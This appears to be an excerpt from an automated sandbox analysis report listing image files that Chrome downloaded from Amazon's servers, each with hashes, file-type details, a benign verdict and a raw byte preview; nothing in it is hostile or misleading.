                                                                                                                                                                                                                                                                      SHA-256:A9A41455C3718C1639264909F223AC170F76883938937C370D034C80270A3FA1
                                                                                                                                                                                                                                                                      SHA-512:EB7E7F92425BEDBC494C4A12DF3BE328E61C4ED0EFD49EBB03C58B2727CFC8CEB3D3675B7F5E5F09321BB2EDF5FDA5EA02306471E0CA00A5A9CC3999F6BE9BA2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4...................................................................iu.#P/.y....3#}..8..D......>..#.A......<...\N.&._m .\B..Z....M..n...|.I..L6V.c$K....>.1.o.N.a.b...5..!!.|r$......d...../....T.E.q0..k..\ju.X.Y..'....F...]q..1GM~S....-_O.w.....D ....2...9f....3.?CO...nh#.X..m..u.ci$x...^....`....p..........]....m.)..o........V..`........<..6.......s...up..6.f.......3..z.U..s.|.kf..^.......<.......G.V....a.mY@.4.]Y..(.e.Z.jdUm......D...S.<....L^....D.....eJ.i..I[..2%.....t..r..........tk...k....].eu...W.6.....;..z......j..o.Y.NQlJ,.47.f...".[7`..B;@..d,..i..ru.....^f_.......).^....PK../..#..F:>l.*.!.e.I+..H.ip_.,Y...m.,.d...q.gM...u.&*%......@..a...z[.:^..Vj...P.S..\d........;...i.ZEik..-.....Ps8/Ws.,{./.G:.L.N[.I.a.j'......c...j.....@........>p.-"........~.V.X..x......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4677
                                                                                                                                                                                                                                                                      Entropy (8bit):7.923646765818141
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7qRPk232k3PyMTJDKPK3zMxTs36lEnZqMFQQEzppSwvnhkCHuf8EJdJU:G9kE3PyM4S3zYs36l3Myjtvh5sJvU
                                                                                                                                                                                                                                                                      MD5:F8C4A06CA2862A8775690075FD0E0F2A
                                                                                                                                                                                                                                                                      SHA1:1F7F0CE030F17348E739756F7C0338081D9E77EA
                                                                                                                                                                                                                                                                      SHA-256:E22A3DD370CD5FE0D6F2533D6122848841F15BBA13120A0BE3E557218D832251
                                                                                                                                                                                                                                                                      SHA-512:5E07D825DBFB2A8E01BBD9061BBF637DFC908074BF0688299C5BEEB9113A46A73ECD7230C922BE95DF84C1AD834733BFC7D71F747B1B918B270681F5F5D0EB59
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE._SY116_CB566513572_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t....".................................................................!1."Q....ATa..#23Rbq..DSUcert..........$%5BC.....................................................!1...A2Qq..".#$BRa.....%C..............?...B...k. ......J.w..;..'....m3..Y...Kr..Wj=...(.P...n..T}..:.U...2yZ.M.Ge.5.(.y..=...'u-..Tz+;.X.Q.....&..N.4... .49....N.}.Ix.....D............9^...rV4.}H....../../{d..k.gS....M.I.c..F.~.\...?.....-}C`...o.[./ER.ZY6.xtg..p0p.u.Z.Sm....S\..n..C.s.....C8..C....mo..L..|..C4...........P$.q...dyA...|.......h..%......P.<......]M....zi.J..z.f`.M#......0%H.+.....X..h.......s}d4@.r.s...'...}.>P..v..=.02.Ej......3ER..~..L%....B...O=].V2'A<.d...G?4m;.y-k.>....:.......}Go%.y{.N{.(....v6'....P..q.>.(Rz8.r...Z...j39.!l.2.e.d_79.r.tF..Ep.\.....;...\.!...s......". .....*z.[pe.a.`.7...... ..v.'....L....OG
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):31218
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973719591940241
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1QfCCUFEpIb6G32VIESvJNXvtM3ZwIpNyieLE:hEZSvJBV+wQeLE
                                                                                                                                                                                                                                                                      MD5:16CFCECFDA7A15FB3AB0B1F3B5E4A983
                                                                                                                                                                                                                                                                      SHA1:0658971F8A134A4B2FDA0E193413945AF8365485
                                                                                                                                                                                                                                                                      SHA-256:874F7BA26AD0619E77806E1A410E6406A68B95F2937C30713FE72B1F098A94AA
                                                                                                                                                                                                                                                                      SHA-512:5C3A32C8F813149EDC21CE5D8BE0B064AC4CA33220D7B2747FC1E2D9C821CFC2BEA77A2DB7313F3AE1DA24201F337B59BD00F57575AB5EACD4B4D5B75A27EBA3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoor-sports-Tennis-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................":b..PU.p.....G4.dm.@j#"F0WGS..}^.U.*V...D..>[V....s[....G.....q8.J.......<..hI&|.=Z.r..\.....sc..W#..[.*.#..q....{.....".....l.......(...lpC<.J.#U.Tk..X.:I..1.....vdDr..8.W."..Ygr.*.F.$A.G.!_..$ux....F...F..:Id...Q.c...|....s.f/w.YA\......+..+d.%..K..s.C.....O.....+....H..c.'':.-E..n_....5....|......ga..K,..Q..:\..2c...#UG..K.;.6.?...e.o.../.a.9....9Lk...cP...5.$r....]+O..../Y.Z...Fs<'*\.^.Q...PjD...K.....it.^...b=.C.9....W.1.....#..s.4r..fGh.[.;..R(.2..G]\....T.s7.z.h..dM.M..I.....V..C.nX...*.OQ*.:N.V...5....V...E..Sy~z.#U.l.V...9..7.eV..........,..+....vy,..f..]..r.......Y%z!=....Q.^.nk..N.y.%.=.U..sW.....e..r..!H...I....?WC..^....n.,.....e...iU.'......='..@.gC....R..U.k_R.]/1.....xQ\.W...WoJ...g9..y...:.....a.u!..k..SO.f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):25418
                                                                                                                                                                                                                                                                      Entropy (8bit):7.906627824881822
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:4YNg7gLwvk1MTQ5vF7IndO2lnVmFPR1l3UFtZz+zPUMQk:4YycMvkbb7InE2hO1l3UFtUMk
                                                                                                                                                                                                                                                                      MD5:0EDE8C118B6F5096AD3419D19BE433D9
                                                                                                                                                                                                                                                                      SHA1:842347181E32996C2F559FB0F4BA8DC275AEB8E8
                                                                                                                                                                                                                                                                      SHA-256:33A0DC82CE8301529A7BD7E5ABF6BB215001C3CC4018B7848FD60B3CCAB94F82
                                                                                                                                                                                                                                                                      SHA-512:98C6D6B1CB3CB407DF87BDB0224C1D949EB377F64AD397BC5D310214EEE1F3DC16D770268FE8CFF3B28C97335D6DD622881219C7C40BBD75E97CC3EE69333A40
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH082_AE_BTS24_GW_bubbler_GL_Dealsonbooks_400x400_EN._CB565231256_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2641
                                                                                                                                                                                                                                                                      Entropy (8bit):7.802611157766169
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rQIWfSbvB6rSGiyhDle8DJEJZVjn9v3FGtW1P2LDbZNAaa:TLIWfSb5Fy7kPN3QtW1PwbZja
                                                                                                                                                                                                                                                                      MD5:32BB36DC05797B0D7BB0CDAB044ABF02
                                                                                                                                                                                                                                                                      SHA1:A20765DE3D0E1026192E094310F3FCC8F464FF10
                                                                                                                                                                                                                                                                      SHA-256:3EDB04C196F083739667AD602EE031EBD82BB8B8855CE38F37AA94BE74293F1A
                                                                                                                                                                                                                                                                      SHA-512:E45D0D80AC509F9166C40B3A11E1BDAD7AD2A55F9F48B952C55E8A3D9A88552CC156C7C2A7A1B1010784D46F040AF1C665CB8654B2D9F4A08C93FAC34660E453
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1AQ."2q..#RaB.....$c................................................1!A..Q............?...........0..Qi.A#7..H..w....b&...'K.H9..[.1:..M......ooD.j..f...C.G.4......uG...-.&...............1...b[...+@~.@...f.g..W.....VG!Q#.......(...u.a$.Ow<...'m.&>.....:.......l{R.@...UPw.9.n|.C..3Q..x...C<.#X...x.. ...=.q.i.t...&m.......]....dH./Ke...c.ad.W.}k..V....P....k8MkY...$pS.............O...k7.y.K{..sNUGz..............dz....P....Ek.O...J..@..Of.Yc....3.M..d.|.U..v.G..~i.i>=...5.=[.|<..h.&..]..{...=.k.............-J..ePI>.J....h.r./;.._llE....z...>"....._v.98......im..p-.NHW. 2.0Y+W.@U.lS}...>..4u?W.llF.T.me.....D.Vf..5c.B...'...^.{/....6.7....0.7.C.4...%.2r3)....v..;.r..n....F65.zn...:4....q2.Z.0...[op..Y.F..#%.sR.O.u...{r;H.ek.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):23866
                                                                                                                                                                                                                                                                      Entropy (8bit):7.964804808969445
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:SJMx3w6g/MZDGp2WqaK7gjF+deGVhxeF/dv/tMl/aOkfcbGuLI/J+zHqBZU0K3Op:SeAQDpW3pUd9yj/tMl/apfcbzM/QHoUg
                                                                                                                                                                                                                                                                      MD5:5A6F5A749A4FAF5B1D87F49DC88D9A7B
                                                                                                                                                                                                                                                                      SHA1:A5A274FB0C01B3DCF3E5AC0985A425769405E157
                                                                                                                                                                                                                                                                      SHA-256:AADA76D0DFEDA6DC05931529CF9009210DE9A1D27105A343FF8C67F26EAF553D
                                                                                                                                                                                                                                                                      SHA-512:943B7F95202B0A6AC8C1EDC613C0CA407BA48F33DC963B356BE6EF1FE9D44B909F1094FEC74DDF3BE0BA9BF11B1E8E6955113690A968AA6B17FDD7D9CE3DC28F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/710sizyJOdL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........5..................................................................X...................Kj/:T..U#..0...yG.Ys...`5.N....6...........DHP=..lvd@y......W..N!.3...-A..K..{i.4...w5iP.$.Y.we.,.....).d.....y.%a...:..e....Z.k|......!.+..M..y....[.Dv.be..e*.).3.e.H.$h....8%.._/te......s.XW+2...ol..,+....B..x.9....;....AY.N....g..[...3&.4u.Y.#.}H...'..<....-1{M.O.d....%S}5...q.f..>j..?D.....DVJ....:.b....<.V.;N^E......(.\=.=.m}^...j}^.*..0.i...-.9 C.8..:.....=,...6gL...F...4:.q...tljL...N..E;ZC.]..;.t4.._./..2.e...G....M...S.V6..+. ....V..f..o.5...8..^U...F........{..$D....x.k..<^..w.....4..l%:....Ys..Z...H..=h...-...A.....U%.+..S.q..U)......!..N..F$Sk../.s..l..o.........G..d.l.tP..E%..}o.....+.R....}.".tL..T..v."o..S/u.W5J.5...z..uC.h...a.\..(....Qu..|.|..i|clh.....HO..0b.VD....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14535
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879436571334247
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:yJTbBqd41qycOfMACm+Ndq2f5zog1yPCsVasjCCML8OwKQ+:yJTbV17cO+84eNwsjCdLo+
                                                                                                                                                                                                                                                                      MD5:CB57C5063D4D6A58113CA014E0CD4A68
                                                                                                                                                                                                                                                                      SHA1:28057B6E3C95708FE4C43D83CC0EF15473E3A8A4
                                                                                                                                                                                                                                                                      SHA-256:A81C85E7996BC6D75C2535B24B65C9E667FA538A6E426BD8B0CC5AB833F1188F
                                                                                                                                                                                                                                                                      SHA-512:ABF7A687B5C7D47C0979BFADEC367F49E63F18BCB0032B264AF1249F2916D7FEFA837AAD5E7DA6FB1DA5AA9DC699DBDB311DA5785004A809002A3A8F1D1B013A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a2.2..........]...........:....................................{............}..............u..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.14ecb42f2c, 2023/01/13-12:25:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db" xmpMM:DocumentID="xmp.did:384E825BB64F11EDAC9EB44161D1C413" xmpMM:InstanceID="xmp.iid:384E825AB64F11EDAC9EB44161D1C413" xmp:CreatorTool="Adobe Photoshop 24.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b5fda8ec-2814-4cb6-8f13-b3de686f05db" stRef:documentID="xmp.did:b5fda8ec-2814-4cb6-8f13-b3de686f05db"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x229, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16602
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946985815408516
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:NZGXk0ln+HK/mgAN/aoZMtoBlvEBmYGxFBteCUg0CtoyEY6CWG9:NZ1in4KO/dOt6vimrPeCP0LzCx
                                                                                                                                                                                                                                                                      MD5:68A9D1CAA1C8699541C7F109E9219430
                                                                                                                                                                                                                                                                      SHA1:5B5072E8A43D16092B0D0A76E01D8650463D83B6
                                                                                                                                                                                                                                                                      SHA-256:FE334E2034CD8234D79FDB4E4D95A63DEFEC770D23571E363F87707C23BDB45D
                                                                                                                                                                                                                                                                      SHA-512:9A8132C571A04D2225FC180EB41F58F19268C94B9767DFBF678F73FD6AD62BF445D8743D306C74E7ECD434B6257A372EEF31461E78877C5BD083EE43DA3CD344
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61MltGgbc4L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5........................................................................................PR....I(.Z.ki.!1.U..u1.@.................O9.-.H.=.........8..uS.[:\.$u..6mx~_...e.F}..ZL#^VE.)P.............KUBeT.<.ZEo.B...K.VH+..3....B.."i].3O...R.....O.5.Y.._..N.t._......@......<z.E.......2M:.F.R...C.}.......s....{e=...s.$..3;..-%)%:...U.(.(..us.Y..J+SFJ.@.V......}5.[.b).j..+...-...RehZ....Wv..R.cn.$82]_X>.&..aU~..\i.k.G....`O.>.&x..kN.iA.....69.....V.Y.;.-JVk.5.....,.UO.e.<F5!.....[ugF...X..||eu.[..Y..R:...[X..h.A%8U.#.*,..t.W.)......v2.i.v.~..........f&.....H.8.r.].'...z..).5r.5...%."...>P.v_0sm.Q^..]*Y.~.l..I#..EI..0G:h..1..._0l-...!.,K.^Q.ca.s.....b.->.Y.....b....I^.l..jw..6Rw.YS..3.K3.. 92.....5v.Y.../h.-.Eu..)..:....)...y..7.U..0.;Y......YzT.T.....EI"p..8.a..f...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 88x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7284
                                                                                                                                                                                                                                                                      Entropy (8bit):7.950745941867645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TCxupXbfIYU9zr46OrLedCpo0OO+2k7QK2tcZylct+2U8pZ/PKripocgXjuVuomV:GQ/ZHeO+2k7QrtcK4pzSujmhvb
                                                                                                                                                                                                                                                                      MD5:46624F9C9A277EAAA1326B699555EA5B
                                                                                                                                                                                                                                                                      SHA1:938163966F5BEF2851198A48FD353D99BFC71CAD
                                                                                                                                                                                                                                                                      SHA-256:188E173F77E998734D1DD98261914A86BB0CD990206156B55896A9C2CA9193B5
                                                                                                                                                                                                                                                                      SHA-512:AF01E8AB6A9F2EAFEEFF81633F452BE3D2070EBE2B44E9D758BB4C73648ED82A47971CFDFD1819FB521E779D9D40C87E1B8A2381BCCBCD037D00E10C6368B627
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71emwKEi1fL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.X.."..............................................................!1.."A.2Qqs..#ar..34c..%BRT....$CSd.......DUb....................................................1!..4Aaq....#2Q..."$3BR.Cr...............?.....I.8X.>..&..S....-..h..*$.......;P.t.@.._......7.X..cZ...m~&`gY.|9..Z.2I>....&.?......hd....u..A.58..J... ........w>f..W.T...?.e..........?.e......#L.j.m_.a.]o.|.x......].i...!m.-W.Q...;~d..)..Qzua..3;....|..v.\.......CF......b.{$.a.......[e>..Q.o.S..1.b..3.{...U......7.......U.?].>.?3.K..l:T}..b...Z..gk.4.H......K/..[...F......6C.....)wL.P.mG....A[.i..D.H.....z#u........#ly...Z....a.VR..{.\U..{...K.......jU......O..........yWA...n.6..R..\.g...q.j?.....Oud.G...|.>.t()...8...+.LU...X...>...LXBb)...C.?.>*#......>.^E^..q..ia...{T.0..J.......a...z...S..*.4.e...m....\.i]A.........W/...Z.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 166x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8400
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9486007861616645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:gRNBD9lK4NJ/XVM44lCkRViLp/ZFIQUvrgLTiyk:QBO4RM44l9X6hZmUXiyk
                                                                                                                                                                                                                                                                      MD5:58F0319D9F2025BA4F0003FC93B1C5C7
                                                                                                                                                                                                                                                                      SHA1:9A63CB7711F1DE10064F4AFE6399B2A6DC9C1667
                                                                                                                                                                                                                                                                      SHA-256:C41226B85ED60E92418800485D900D69BA7326A2F8665B9F7397FC35E90A9A6F
                                                                                                                                                                                                                                                                      SHA-512:25DA3C1AB169A7483B7C20B24FCB4CE528A001D5AB5B7854AE7BBA31552189BCFCFFAD3140A51D243387DC283803670365FE31921AB8A9052DA4710BDD6752D0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..................................................................!1."2U....#$36AQRSqu......BCb....ac..Ts..47Dr..Et....................................................!1R...#23AQq."Ba................?.......OP.._M.6.3E.0.....P.n.........J..2zU._{...a{.^.T....7.+....Q.....d..3E.&....J..2zT~zf..u..=*..@I.=3~R..L......)]~&OJ.4P.o.L....'.G.o.W_...:.@gu.!..\.%.......4..._Q..=..Y!.R.<.....P.W.o.W_.....7.+....W[\.....A.n.v.......T..S>.....W...7.d........J..2zT~zf..u..=*G..,.....lO`.&........5.....Y[.n.....m....J5.Z.G]C...gI..I.y.N...v.-..........Y.$1.)..N.).!..y~/....5.&.|./....!.e...N....o..VJ...m.........-..{....TA..>r....m.y..l...m..zI.,......1q.@.ZV.V....`...{.nG.t..flqiB...=q.?.B.. ......Q.r8M....]\<.Mp.;.R..H.%...vU`....^........,...O..l.%.{.5...[O..Y!wW_]I..J......R....R5.....7..G......7..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):59849
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9719454048172675
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:AV/K8PMmwETLFFJn2vkNrgVmZIud0DSnZSe7+P:G/KQwETLdnW8rgVK0Dk8e7+P
                                                                                                                                                                                                                                                                      MD5:987E3DDAC3D34C5724954BEFFD75D52E
                                                                                                                                                                                                                                                                      SHA1:884F33C5CE2BE7E8B52CAC1311B89E138C378AE7
                                                                                                                                                                                                                                                                      SHA-256:9BA31014F9F97F405BCD46F9EA2CC124F7EEDDB7E0FE7AE579C37F5099C50D30
                                                                                                                                                                                                                                                                      SHA-512:973057698AF356A56D1BB6CE83797EF91FB76AB5E941014640058108BCFD269C0006A9866B2D0D7DEC7096531F2076135CEDC68D8D09B479E61C87AF29E2C5E8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986229_UAE_Budget_Store_AE_xsite_toys_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................<..................................................................................X..0...@.WoQ.....q..g.>?uK.....}[...&.Y?0.....................X{.dX......yG.........^..r...BJ.C.s.:................Q."...s.I.w8..........3;.I.s............<~...!....^.............d.h.$.............:V?..v.ef .9..........e.....u...........2e....Y..}...........R...;'.r.M.@.........47.R?........q.-<#vQz_goA.S:.K."...B.hX...?....Z..3}y|.?y|...8K...@.....Y..-.a............~.G...ox.)Y.w.-........... |...}U...o.0...K)....#H....D./"!...........?....].sgF?./..........W........Pd...E.y.i>p..&,.S.uG`...#.Y.P.Yr..............B.b.-/.:.f...,p..')XVG.p..........F.....@....}..&H.M.@..:.4.+#Ps{..{........]}.....v.l.V.v9.F..O....}.k...........!...B..}.B....0.....Y..8.._ .......4...=.>.W`.>.6...2|..xd...}.&.e...y.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D7783%26at%3D7783%26t%3D1724264961819%26csmtags%3DendVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):32623
                                                                                                                                                                                                                                                                      Entropy (8bit):7.979197309508208
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:ABCDB5dXobtpQnkMxJz7c/+6E/qk/7RbrkKZqNEkhKBg0zbjkbOHt5ZCos:ABCDNXoRbMdtZ7RsE6h6bj7N5Rs
                                                                                                                                                                                                                                                                      MD5:B8D5AF7692CE01989CFBFCC4906AEAFE
                                                                                                                                                                                                                                                                      SHA1:BDEF4E8FE713D6E1B7EF7DD7CA4BF41046DCBFE3
